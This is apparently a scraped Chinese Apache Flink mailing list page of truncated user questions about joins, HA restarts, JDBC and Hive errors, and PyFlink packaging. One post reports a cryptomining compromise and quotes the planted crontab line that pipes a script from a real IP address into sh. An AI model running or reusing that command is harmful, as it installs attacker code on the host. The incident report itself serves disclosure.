在做join时 ksql 会强制检查两个表的key是否相同,如果不同则报错,感觉这是一个比较好的方法。
你说 “目前 Upsert-kafka 要求具有相同key的数据在相同 partition 的。因为 kafka 仅保证 partiiton 内按
offset 读取,如果相同 key 的数据分布在不同 partition 的话,那么读取会乱序。”
flink 中两个表不使用相同的key 也可以成功 join ,但数据会出现错误,这样的话,在编译sql时报错应该更好
--
Sent from: http://apache-flink.147419.n8.nabble.com/
我也想知道 flink 在对 kafka 消息进行 join 时,是否对按主键分区有要求,KSQL有强制性的要求
--
Sent from: http://apache-flink.147419.n8.nabble.com/
Flink job manager HA 是否可以像 Hadoop Name Node 一样手动重启,同时保证集群正常运行?
我发现 job manager 占用内存似乎总是在缓慢不断增长,Hadoop Name Node 也有这个问题,我通过隔一段时间轮动重启Hadoop
Name Node 解决这个问题,在HA模式下Flink job manager 是否可以轮动重启?
--
Sent from: http://apache-flink.147419.n8.nabble.com/
运行 1.12.2 standalone 集群,不定期会出现类似这种错误,请问这有可能是什么原因导致的?谢谢!
Caused by: java.io.IOException: Failed to fetch BLOB
fb90d0fce9ff3ad8353ea97e46f9c913/p-bc0d39187ed200f9df64f90463534862858961a2-2ff77a5adb95af29376c6699173c3969
from hb3-dev-gem-svc1-000/10.30.69.13:43003 and store it under
/home/gum/flink_t
我不是安全专家,不知道如何才能确认是 flink 的问题,但从现象看跟之前 flink 1.10
遇到的问题非常类似,建议你们能有这方面的测试用例,也能把测试结果提供出来
--
Sent from: http://apache-flink.147419.n8.nabble.com/
我自己编译
https://github.com/apache/flink/archive/release-1.12.2-rc2.tar.gz,然后部署在了服务器上,为了更新操作系统补丁,绑定了公网ip,这时
jobmanager 的 8081 端口就暴露在互联网上了,然后就有挖矿程序来了,在crontab 中增加了这行
* * * * * curl http://195.3.146.118/spr.sh | sh > /dev/null 2>&1
之前使用 1.10时也遇到过类似情况,我记得 1.12 似乎没有这个问题了,所以这次没有留意,就过有发生了,我基本可以确定是 flink
引起
我编译的flink 1.12.2-rc2 被挖矿,这个漏洞之前不是堵住了吗?
--
Sent from: http://apache-flink.147419.n8.nabble.com/
有 checkpoint 吗?
--
Sent from: http://apache-flink.147419.n8.nabble.com/
我通过实验确认这是升级 MySql JDBC Driver 8.0.23 造成的,回到 MySql JDBC Driver
8.0.22,就没有问题,我提交了 issue
https://issues.apache.org/jira/browse/FLINK-21240
--
Sent from: http://apache-flink.147419.n8.nabble.com/
在 mysql 中创建表
CREATE TABLE `p_port_packet_loss_5m` (
`id` binary(16) NOT NULL,
`coltime` datetime NOT NULL,
...
在flink 中创建表
create table if not exists p_port_packet_loss_5m
(
id bytes,
coltime timestamp,
...)
WITH (
'connector' = 'jdbc',
'url' = 'jdbc:mysql://ip:port/mydatabase',
在flin
当前的 1.13-snapshot 支持了吗?我可以试试吗?
--
Sent from: http://apache-flink.147419.n8.nabble.com/
p1.time 是数据记录里的时间,也用这个时间做分区
--
Sent from: http://apache-flink.147419.n8.nabble.com/
有时候这种job持续2个多小时,我只能cancel job,但无法正常 cancel,都会导致 taskmanager 挂掉,错误如下
2021-01-31 23:04:23,677 ERROR
org.apache.flink.runtime.taskexecutor.TaskExecutor [] - Task did
not exit gracefully within 180 + seconds.
org.apache.flink.util.FlinkRuntimeException: Task did not exit gracefully
within 18
打开了 debug 级别的日志,有这样的错误
2021-01-31 20:45:30,364 DEBUG
org.apache.flink.runtime.io.network.partition.ResultPartitionManager [] -
Released partition dc8a2804b6df6b0ceaee2610ccf6c6e5#312 produced by
448c5ac36dcda818f56ec5bbd728da10.
2021-01-31 20:45:30,392 DEBUG
org.apache.flink.runtime.taskexecutor.T
周期性batch mode 从 hive 提取数据插入 mysql,每批次 10K 到 20K 行数据,多数情况下
10-20秒可以完成,但不定期就会很长时间,能达到 20多分钟,但也能成功,查看了日志也看不到错误,检查 mysql 也没有发现锁表,怀疑 hive
metastore 的性能,但也没看出问题。
请教分析思路,从 flink 上能看出job 在等待什么吗?
--
Sent from: http://apache-flink.147419.n8.nabble.com/
具体需求是这样,采集取得的通道总流量5分钟一次存入 hive 表,为了取得 5 分钟内该通道的流量,需要前后2次采集到的总流量相减,我想用同一个 hive
表自己相互 join,形成 2 个 hive 流 join,不知道是否可以实现?或者有其他实现方法吗?
我现在使用 crontab 定时 batch 模式做,希望能改成 stream 模式
select p1.traffic -p2.traffic
from p as p1
inner join p as p2 on p1.id=p2.id and p1.time=p2.time + interval 5 minutes
--
S
谢谢!不好意思没有仔细读文档,现在哪里能下载build 好的 Linux 下的 Python 3.8 的 pyflink 1.12.1
吗?觉得自己build的还是不放心
--
Sent from: http://apache-flink.147419.n8.nabble.com/
在 Linux python 3.8上无法安装 pyflink 1.12.1 ,最高是 1.12.0,查看可以提供的安装文件
https://pypi.org/project/apache-flink/#files 中,python 3.8 只有一个安装文件
apache_flink-1.12.1-cp38-cp38-macosx_10_9_x86_64.whl 。
而 pyflink 1.12.0 的 python 3.8 有 2个安装文件
apache_flink-1.12.0-cp38-cp38-manylinux1_x86_64.whl 和
apache_flink-1.12.0-
拿到了吗?有什么发现吗?
--
Sent from: http://apache-flink.147419.n8.nabble.com/
https://pan.baidu.com/s/1GHdfeF2y8RUW_Htgdn4KbQ 提取码: piaf
--
Sent from: http://apache-flink.147419.n8.nabble.com/
可以的,怎么发给你?
--
Sent from: http://apache-flink.147419.n8.nabble.com/
多谢!打开了DEBUG日志,仍然只有最后一个ERROR,不过之前有不少包含
kubernetes.client.dsl.internal.WatchConnectionManager 的日志,grep
了一部分,能看出些什么吗?
job-debug-0118.log:2021-01-19 02:12:25,551 DEBUG
io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] -
WebSocket successfully opened
job-debug-0118.log:2021-01-19 02:
我查看了一下之前的日志,没有发现 too old resource
version,而且连续几个日志都没有其他错误,直接就这个错误,restart,然后就是一个新日志了。
我用的k8s集群似乎网络确实不太稳定,请教一下如何测试Pod和APIServer之间的网络比较容易说明问题?ping?或者什么工具?
--
Sent from: http://apache-flink.147419.n8.nabble.com/
您好,我刚刚开始使用 flink 1.12.1 HA on
k8s,发现jobmanager大约半小时左右会restart,都是这种错误,您遇到过吗?谢谢!
2021-01-17 04:52:12,399 INFO
org.apache.flink.runtime.jobmaster.slotpool.SlotPoolImpl [] - Suspending
SlotPool.
2021-01-17 04:52:12,399 INFO org.apache.flink.runtime.jobmaster.JobMaster
[] - Close
大约几十分钟就会restart,请教大佬们有查的思路,每次抛出的错误都是一样的,运行一段时间也会积累很多ConfigMap,下面是一个具体的错误
错误内容
2021-01-17 04:16:46,116 ERROR
org.apache.flink.runtime.resourcemanager.StandaloneResourceManager [] -
Fatal error occurred in ResourceManager.
org.apache.flink.runtime.leaderretrieval.LeaderRetrievalException: Error
whi
flink 1.12 standalone cluster,定时batch 模式 insert overwrite 到 hive 表,会随机出现找不到
.staging_ 文件的错误,完整错误信息如下:org.apache.flink.runtime.JobException: Recovery
is suppressed by NoRestartBackoffTimeStrategy at
org.apache.flink.runtime.executiongraph.failover.flip1.ExecutionFailureHandler.handleFailure(Ex
需求是这样,mysql中使用 binary(16) 存储 uuid,读取到 flink中需要转换成文本串的uuid,sql是这样
select bin_to_uuid(id, true) as text_uuid from usertable
我尝试使用,报错说 bin_to_uuid 找不到
--
Sent from: http://apache-flink.147419.n8.nabble.com/
自己回答一下,供其他人参考。
换成flink 1.12.0-rc1,用相同sql处理相同数据,结果跟 hive 计算的结果相同,确认是 1.11.2
的一个bug,1.12应该已经改正了
--
Sent from: http://apache-flink.147419.n8.nabble.com/
我用相同的一个表自己 inner join 自己,取不同时间点,得到相同值
sql是这样,p5m 和 p0m 都是 snmpprobe.p_snmp_ifxtable 表,时间不同
select
p0m.coltime, p0m.ifhcinoctets a, p0m.ifhcoutoctets c,
p5m.coltime, p5m.ifhcinoctets b, p5m.ifhcoutoctets d
from snmpprobe.p_snmp_ifxtable as p0m
inner join snmpprobe.p_snmp_ifxtable as p5m on p0
我用相同的一个表自己 inner join 自己,取不同时间点,得到相同值
sql是这样,p5m 和 p0m 都是 snmpprobe.p_snmp_ifxtable 表,时间不同
select
p0m.coltime, p0m.ifhcinoctets a, p0m.ifhcoutoctets c,
p5m.coltime, p5m.ifhcinoctets b, p5m.ifhcoutoctets d
from snmpprobe.p_snmp_ifxtable as p0m
inner join snmpprobe.p_snmp_ifxtable as p5m on p0m.id=p
30 matches
Mail list logo